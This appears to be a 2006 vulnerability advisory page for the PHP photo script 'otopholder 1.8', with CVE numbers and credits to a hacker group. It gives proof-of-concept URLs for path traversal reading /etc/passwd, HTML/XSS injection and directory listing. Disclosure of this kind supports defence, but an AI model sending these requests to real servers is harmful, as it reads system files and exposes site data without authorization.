otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln

2006.08.23

Credit: Vampire

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2006-4260 | CVE-2006-4259

CWE: CWE-79

vendor:
http://www.jakeo.com
vuln :
http://[host]/foto/index.php?path=../../etc/passwd
http://[host]/foto/index.php?path=<b>xss</b>
http://[host]/foto/index.php?path=../../[directory listing]
Author : Vampire
Vampire_chiristof<img src="/imgs/at.gif" border=0 align=middle>yahoo.com
Homepage : Www.HackerZ.iR
Www.H4ckerZ.Com
Iran HackerZ Security Team

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.